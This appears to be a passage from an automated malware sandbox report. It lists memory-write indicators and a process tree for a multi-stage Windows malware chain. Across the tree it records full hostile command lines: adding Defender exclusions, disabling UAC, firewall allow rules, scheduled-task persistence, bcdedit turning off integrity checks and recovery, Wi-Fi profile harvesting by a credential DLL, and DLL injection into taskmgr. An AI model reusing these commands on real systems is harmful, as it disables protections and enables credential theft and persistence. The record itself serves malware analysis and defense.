2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
1992	7ce0dca0aa.exe
1992	7ce0dca0aa.exe
1992	7ce0dca0aa.exe
1992	7ce0dca0aa.exe
1992	7ce0dca0aa.exe
1992	7ce0dca0aa.exe
1992	7ce0dca0aa.exe
1992	7ce0dca0aa.exe
1992	7ce0dca0aa.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1048 wrote to memory of 2568	1048	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe	28
PID 1048 wrote to memory of 2568	1048	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe	28
PID 1048 wrote to memory of 2568	1048	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe	28
PID 1048 wrote to memory of 2568	1048	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe	28
PID 2568 wrote to memory of 2492	2568	explorta.exe	30
PID 2568 wrote to memory of 2492	2568	explorta.exe	30
PID 2568 wrote to memory of 2492	2568	explorta.exe	30
PID 2568 wrote to memory of 2492	2568	explorta.exe	30
PID 2568 wrote to memory of 2164	2568	explorta.exe	31
PID 2568 wrote to memory of 2164	2568	explorta.exe	31
PID 2568 wrote to memory of 2164	2568	explorta.exe	31
PID 2568 wrote to memory of 2164	2568	explorta.exe	31
PID 2164 wrote to memory of 2168	2164	amert.exe	32
PID 2164 wrote to memory of 2168	2164	amert.exe	32
PID 2164 wrote to memory of 2168	2164	amert.exe	32
PID 2164 wrote to memory of 2168	2164	amert.exe	32
PID 2168 wrote to memory of 1480	2168	explorha.exe	36
PID 2168 wrote to memory of 1480	2168	explorha.exe	36
PID 2168 wrote to memory of 1480	2168	explorha.exe	36
PID 2168 wrote to memory of 1480	2168	explorha.exe	36
PID 2168 wrote to memory of 1480	2168	explorha.exe	36
PID 2168 wrote to memory of 1480	2168	explorha.exe	36
PID 2168 wrote to memory of 1480	2168	explorha.exe	36
PID 1480 wrote to memory of 2360	1480	swiiiii.exe	38
PID 1480 wrote to memory of 2360	1480	swiiiii.exe	38
PID 1480 wrote to memory of 2360	1480	swiiiii.exe	38
PID 1480 wrote to memory of 2360	1480	swiiiii.exe	38
PID 1480 wrote to memory of 2360	1480	swiiiii.exe	38
PID 1480 wrote to memory of 2360	1480	swiiiii.exe	38
PID 1480 wrote to memory of 2360	1480	swiiiii.exe	38
PID 1480 wrote to memory of 2360	1480	swiiiii.exe	38
PID 1480 wrote to memory of 2360	1480	swiiiii.exe	38
PID 1480 wrote to memory of 2360	1480	swiiiii.exe	38
PID 1480 wrote to memory of 2360	1480	swiiiii.exe	38
PID 1480 wrote to memory of 2360	1480	swiiiii.exe	38
PID 1480 wrote to memory of 2360	1480	swiiiii.exe	38
PID 2360 wrote to memory of 3040	2360	RegAsm.exe	39
PID 2360 wrote to memory of 3040	2360	RegAsm.exe	39
PID 2360 wrote to memory of 3040	2360	RegAsm.exe	39
PID 2360 wrote to memory of 3040	2360	RegAsm.exe	39
PID 1480 wrote to memory of 880	1480	swiiiii.exe	40
PID 1480 wrote to memory of 880	1480	swiiiii.exe	40
PID 1480 wrote to memory of 880	1480	swiiiii.exe	40
PID 1480 wrote to memory of 880	1480	swiiiii.exe	40
PID 2568 wrote to memory of 332	2568	explorta.exe	41
PID 2568 wrote to memory of 332	2568	explorta.exe	41
PID 2568 wrote to memory of 332	2568	explorta.exe	41
PID 2568 wrote to memory of 332	2568	explorta.exe	41
PID 2168 wrote to memory of 784	2168	explorha.exe	42
PID 2168 wrote to memory of 784	2168	explorha.exe	42
PID 2168 wrote to memory of 784	2168	explorha.exe	42
PID 2168 wrote to memory of 784	2168	explorha.exe	42
PID 2168 wrote to memory of 784	2168	explorha.exe	42
PID 2168 wrote to memory of 784	2168	explorha.exe	42
PID 2168 wrote to memory of 784	2168	explorha.exe	42
PID 784 wrote to memory of 2192	784	rundll32.exe	43
PID 784 wrote to memory of 2192	784	rundll32.exe	43
PID 784 wrote to memory of 2192	784	rundll32.exe	43
PID 784 wrote to memory of 2192	784	rundll32.exe	43
PID 2192 wrote to memory of 812	2192	rundll32.exe	44
PID 2192 wrote to memory of 812	2192	rundll32.exe	44
PID 2192 wrote to memory of 812	2192	rundll32.exe	44
PID 2192 wrote to memory of 2096	2192	rundll32.exe	46
PID 2192 wrote to memory of 2096	2192	rundll32.exe	46

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

C:\Users\Admin\AppData\Local\Temp\ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe
"C:\Users\Admin\AppData\Local\Temp\ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1048
- C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
  "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of WriteProcessMemory
  PID:2568
- - C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
    "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
    3⤵
    PID:2492
- - C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe
    "C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2164
  - - C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2168
    - - C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1480
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2360
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 256
        7⤵
        Program crash
        
        PID:3040
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1480 -s 556
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:880
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        5⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:784
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        6⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2192
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        
        PID:812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\452737119395_Desktop.zip' -CompressionLevel Optimal
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2096
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
        5⤵
        Blocklisted process makes network request
        Loads dropped DLL
        
        PID:1596
    - - C:\Users\Admin\AppData\Local\Temp\1000073001\swiy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000073001\swiy.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2928
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2980
    - - C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"
        5⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of SetThreadContext
        System policy modification
        
        PID:2372
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:952
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        Drops startup file
        Loads dropped DLL
        
        PID:2520
        
        C:\Users\Admin\Pictures\JxBN2snBiweR9ixOLEKrqfiC.exe
        
        "C:\Users\Admin\Pictures\JxBN2snBiweR9ixOLEKrqfiC.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2060
        
        C:\Users\Admin\Pictures\JxBN2snBiweR9ixOLEKrqfiC.exe
        
        "C:\Users\Admin\Pictures\JxBN2snBiweR9ixOLEKrqfiC.exe"
        8⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:3084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:3668
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:3692
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        9⤵
        
        PID:3932
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        10⤵
        Creates scheduled task(s)
        
        PID:768
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        10⤵
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        10⤵
        
        PID:3324
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:3320
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:2672
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:3200
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:3168
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:3348
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:3516
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:3604
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:3600
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:3596
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:928
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:3792
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:3712
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:3872
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        10⤵
        
        PID:3840
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        10⤵
        Modifies boot configuration data using bcdedit
        
        PID:4012
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        10⤵
        
        PID:3864
        
        C:\Users\Admin\Pictures\CY5T4gZnO8FCA3CHrIx5uMPb.exe
        
        "C:\Users\Admin\Pictures\CY5T4gZnO8FCA3CHrIx5uMPb.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3052
        
        C:\Users\Admin\Pictures\CY5T4gZnO8FCA3CHrIx5uMPb.exe
        
        "C:\Users\Admin\Pictures\CY5T4gZnO8FCA3CHrIx5uMPb.exe"
        8⤵
        Executes dropped EXE
        
        PID:1048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:3708
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:3788
        
        C:\Users\Admin\Pictures\1fUuDRWF6FrLKriwzPr1PsaU.exe
        
        "C:\Users\Admin\Pictures\1fUuDRWF6FrLKriwzPr1PsaU.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1848
        
        C:\Users\Admin\Pictures\1fUuDRWF6FrLKriwzPr1PsaU.exe
        
        "C:\Users\Admin\Pictures\1fUuDRWF6FrLKriwzPr1PsaU.exe"
        8⤵
        Executes dropped EXE
        
        PID:3092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:3720
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:3764
        
        C:\Users\Admin\Pictures\p0Rj0PxxnScZGjcm90ZBVb8w.exe
        
        "C:\Users\Admin\Pictures\p0Rj0PxxnScZGjcm90ZBVb8w.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2160
        
        C:\Users\Admin\AppData\Local\Temp\u1o0.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1o0.0.exe"
        8⤵
        Executes dropped EXE
        
        PID:3188
        
        C:\Users\Admin\AppData\Local\Temp\u1o0.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1o0.1.exe"
        8⤵
        
        PID:4080
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        9⤵
        
        PID:3028
        
        C:\Users\Admin\Pictures\EGsqYBq0r3SiGvoekVdQOiuW.exe
        
        "C:\Users\Admin\Pictures\EGsqYBq0r3SiGvoekVdQOiuW.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2664
        
        C:\Users\Admin\Pictures\EGsqYBq0r3SiGvoekVdQOiuW.exe
        
        "C:\Users\Admin\Pictures\EGsqYBq0r3SiGvoekVdQOiuW.exe"
        8⤵
        Executes dropped EXE
        
        PID:3076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:3848
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:3876
        
        C:\Users\Admin\Pictures\lZ6dox2jcJjO2ctdJOuUvq5Z.exe
        
        "C:\Users\Admin\Pictures\lZ6dox2jcJjO2ctdJOuUvq5Z.exe"
        7⤵
        Modifies firewall policy service
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2864
        
        C:\Users\Admin\Pictures\XM06E6FTYRIil71dCUnwtZHB.exe
        
        "C:\Users\Admin\Pictures\XM06E6FTYRIil71dCUnwtZHB.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1600
        
        C:\Users\Admin\AppData\Local\Temp\7zSD192.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2008
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:3024
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:1012
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:2452
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:1288
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:2712
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:2920
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:1912
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:2412
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:2432
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:2980
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:1288
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:2452
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:2524
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:1720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2484
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:3144
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:4056
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1220
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:3044
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 13:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\MQYbnMs.exe\" it /Wlqdidgixw 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:3712
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:3904
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:3872
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:3876
        
        C:\Users\Admin\Pictures\eGVfW8sCmFYigCswCbgy6jIw.exe
        
        "C:\Users\Admin\Pictures\eGVfW8sCmFYigCswCbgy6jIw.exe"
        7⤵
        
        PID:3564
        
        C:\Users\Admin\AppData\Local\Temp\7zS627B.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        
        PID:1912
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:3472
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:3332
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:3492
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:3500
        
        C:\Windows\SysWOW64\forfiles.exe
        
